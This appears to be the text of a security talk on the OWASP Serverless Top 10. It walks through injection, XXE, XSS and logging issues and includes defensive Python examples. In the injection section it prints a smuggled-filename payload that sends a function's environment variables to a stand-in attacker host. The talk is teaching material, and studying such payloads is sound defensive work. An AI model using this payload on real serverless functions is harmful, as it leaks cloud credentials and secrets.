OWASP Serverless Top 10

INTRODUCTION TO Serverless Top 10
About me
Chandrapal Badshah
Security Enthusiast
Build, Break, Build guy
Would love to talk about plants ;)
Contact:
● twitter.com/@bnchandrapal
● github.com/Chan9390
START WITH WHY
- Simon Sinek
Once upon a time...
Database
Web Server
CPU
Memory
Web Application
Static Files
But ...
Database
Web Server
CPU
Memory
Web Application
Static Files
Security: maintaining/updating the operating system with security patches, WAF/firewall configuration, network monitoring, etc
CHANGED THE GAME
Introduction to Microservices
Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
Introduction to Serverless
The phrase “serverless” doesn’t mean servers are no longer involved. It simply
means that developers no longer have to think that much about them.
Computing resources get used as services without having to manage around
physical capabilities or limits.
https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
Introduction to Serverless
https://martinfowler.com/bliki/Serverless.html
Cloud Providers
Serverless Tools & Frameworks
Who uses Serverless (AWS Lambda)
https://aws.amazon.com/lambda/resources/customer-case-studies/
Features of Function-as-a-Service
➔ Stateless functions
➔ Complete abstraction
➔ Instant, Scalable and event-driven
➔ Pay for what you use
➔ Free trials (AWS Lambda gives 1,000,000* Lambda triggers for free every month)
➔ There is a default timeout
➔ The function guidelines are defined by the Cloud Service Provider
➔ Multiple Languages supported
DEMO - Deploying Serverless App
So simple right ?
What if … ?
OWASP Serverless Top 10
One question ?
Do you think OWASP Serverless Top 10
vulnerabilities are different than OWASP Top 10 ?
● The way the apps are created is similar to that of server-based applications
● There's not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
Let’s jump into OWASP Serverless Top 10
A1: Injection
● Serverless functions don't only support HTTP triggers; they also support cloud storage events, database changes, etc
● SQL/NoSQL injection
● OS Command Injection
● Code Injection - the severity depends on the permissions given to the vulnerable Lambda function
An example scenario: CV filtering system
● User sends mail with CV attached
● Email reaches the server
● AWS SNS sends notification to Lambda
● Lambda gets the mail, parses it if there's a PDF attachment
Can you see the bug ?
The function:
● Checks if the file has a file name
● Checks if the filename ends with .pdf
● Appends the filename to /tmp
● Executes the command pdftotext
Payload (to print the environment variables):
foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
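A hardened version of the pdftotext step from the CV-filtering scenario above, added here as an example (it is not the deck's code): the attachment name is reduced to a basename, checked against an allow-list, and handed to pdftotext as one argv element instead of through a shell. The /tmp working directory and the function names are assumptions.

```python
import os
import re
import subprocess

# Constructed example: a hardened version of the pdftotext step from the
# CV-filtering scenario. Not the deck's original code.
#
# The vulnerable pattern the deck describes is roughly:
#     os.system("pdftotext /tmp/" + filename)
# where `filename` comes straight from the mail attachment, so a name
# containing ';' or '|' becomes extra shell commands.

WORK_DIR = "/tmp"
# Allow-list: a plain name of letters, digits, '.', '_' or '-' ending in .pdf.
# Shell metacharacters, spaces, quotes and '#' never match.
ATTACHMENT_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}\.pdf")


def safe_attachment_name(filename):
    """Return the attachment's basename if it passes the allow-list, else raise.

    os.path.basename drops any directory part ("../../x.pdf" -> "x.pdf"), so
    the file can only ever be looked up inside WORK_DIR.
    """
    if not filename:
        raise ValueError("attachment has no filename")
    name = os.path.basename(filename)
    if not ATTACHMENT_RE.fullmatch(name):
        raise ValueError("rejected attachment name: %r" % filename)
    return name


def build_pdftotext_command(filename):
    """Build the argv list for pdftotext.

    A list passed to subprocess.run is executed without /bin/sh, so the
    filename is exactly one argument and cannot become a second command.
    '-' tells pdftotext to write the extracted text to stdout.
    """
    path = os.path.join(WORK_DIR, safe_attachment_name(filename))
    return ["pdftotext", path, "-"]


def extract_text(filename, timeout=30):
    """Run pdftotext on the validated attachment and return its text."""
    result = subprocess.run(build_pdftotext_command(filename),
                            capture_output=True, text=True,
                            check=True, timeout=timeout)
    return result.stdout
```

The deck's payload above is rejected by safe_attachment_name before any command is built; the timeout also keeps a hostile PDF from holding the function until the Lambda limit.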
A2: Broken Authentication
● Functions are stateless
● Multiple entry points, services, events and triggers and no continuous flow - things can get worse
● Common example: functions meant for internal use only are available to all
A3: Sensitive Data Exposure
● Depends on the architecture, just like other server-based applications
● Common example: functions disclosing logs on some specific endpoint
A bug I recently found
A4: XML External Entity
● Insecure parsing of XML files by the serverless function
● Exploitation may not always be fruitful
Vulnerable code … Downloads the XML file from the bucket and parses it.
The Payload ...
The result…
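A parser for the XML document the function above downloads from the bucket, written so that XXE cannot occur. This is an added example, not the deck's code; the field layout of the CV document and the placeholder path in the sample are assumptions.

```python
import xml.parsers.expat as expat

# Constructed example, not the deck's code: parse the XML downloaded from the
# bucket while refusing any DOCTYPE. Python's expat does not fetch external
# entities on its own, but rejecting DTDs up front also blocks internal-entity
# expansion and keeps the policy explicit if the function later switches to
# another XML library.


class ForbiddenDTDError(ValueError):
    """The document carries a DOCTYPE, which is where XXE payloads live."""


def parse_cv_xml(xml_bytes):
    """Parse a small flat XML document into {tag: text}, refusing any DTD."""
    parser = expat.ParserCreate()
    fields = {}
    open_tags = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Abort before a single entity is declared; the exception propagates
        # out of parser.Parse().
        raise ForbiddenDTDError("DOCTYPE %r is not allowed" % name)

    def start_element(tag, attrs):
        open_tags.append(tag)
        fields.setdefault(tag, "")

    def end_element(tag):
        open_tags.pop()

    def char_data(data):
        if open_tags:
            fields[open_tags[-1]] += data

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_bytes, True)
    return {tag: text.strip() for tag, text in fields.items()}


# Constructed inputs: a benign CV document and one carrying an external entity
# (pointing at a placeholder path) of the kind an XXE payload declares.
SAMPLE_CV_XML = b"<cv><name>Alice</name><email>alice@example.com</email></cv>"
SAMPLE_XXE_XML = (b'<?xml version="1.0"?>'
                  b'<!DOCTYPE cv [<!ENTITY ext SYSTEM "file:///tmp/placeholder">]>'
                  b"<cv><name>&ext;</name></cv>")
```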
A5: Broken Access Control
● Functions with excessive privileges
● If functions are allowed to access anything on the cloud account, then so can an attacker who exploits a vulnerability like code execution
A6: Security Misconfiguration
● Not just the function, but how the function interacts with the environment
● Because of the complexity introduced by the increased number of features/functions, security misconfiguration is very easy
● Can lead to DoS/timeouts
● Example: public S3 buckets
A7: Cross Site Scripting (XSS)
● The most common bug affects serverless functions as well
● Mostly due to lack of user input sanitization
Find the bug… (scenario)
● User sends mail
● Email reaches the server
● AWS SNS sends notification to Lambda
● Lambda gets the mail, parses it and sends the message content to the moderator dashboard
Find the bug…
The function:
● Gets the message content
● Sends the message content to the dashboard
A8: Insecure Deserialization
● Common in Python and NodeJS, but also affects Java and dotNET
● Mostly introduced due to insecure use of third-party libraries
Example Java payload
The payload in request…
And the result…
A9: Using components with known vulnerabilities
● Using insecure dependencies
● The most commonly found issue
● Not every vulnerability will affect serverless functions
● Doesn't always guarantee remote exploitation
A10: Insufficient Logging and Monitoring
● Auditing serverless is even more difficult than traditional web applications
● Since the client interacts directly with the serverless functions, there is no place to implement a WAF or any active monitoring system
● This actually helps attackers
Lambda code
Lambda logs
Lambda Logs (in case of huge payload)
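An audit record written by the function itself, added here as an example (not the deck's code) of how to keep logs useful when a huge payload is involved: instead of the raw body, which a log service may truncate, it records the body's size, its SHA-256 and a bounded preview alongside the invocation metadata. The API Gateway style event shape and the handler name are assumptions.

```python
import hashlib
import json
import logging
import sys

# Constructed example, not the deck's code: an audit line per invocation that
# survives huge payloads. The raw body is never logged in full; the digest lets
# a defender prove what was received, and the preview shows how it started.

PREVIEW_BYTES = 256

log = logging.getLogger("lambda-audit")
log.setLevel(logging.INFO)
if not log.handlers:
    log.addHandler(logging.StreamHandler(sys.stdout))


def audit_record(event, request_id):
    """Build a JSON-serialisable audit entry for one invocation.

    `event` is assumed to be an API Gateway style dict with a string "body";
    other bodies (S3/SNS records, for example) are serialised to JSON so the
    digest still covers the whole trigger payload.
    """
    body = event.get("body")
    if body is None:
        body = ""
    raw = (body.encode("utf-8") if isinstance(body, str)
           else json.dumps(body, sort_keys=True).encode("utf-8"))
    identity = (event.get("requestContext") or {}).get("identity") or {}
    return {
        "request_id": request_id,
        "http_method": event.get("httpMethod"),
        "path": event.get("path"),
        "source_ip": identity.get("sourceIp"),
        "body_bytes": len(raw),
        "body_sha256": hashlib.sha256(raw).hexdigest(),
        "body_preview": raw[:PREVIEW_BYTES].decode("utf-8", "replace"),
        "body_truncated": len(raw) > PREVIEW_BYTES,
    }


def handler(event, context):
    """Lambda entry point: write the audit line first, then do the real work."""
    request_id = getattr(context, "aws_request_id", "local")
    log.info(json.dumps(audit_record(event, request_id)))
    return {"statusCode": 200, "body": "ok"}
```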
Resources
OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project
OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project
Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g
Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0
AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops
PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
Stay tuned !
Damn Vulnerable Serverless App on its way
Any Questions ?

Editor's Notes

  1. The control was with the server. (Give example, cookie is still serverside in serverless)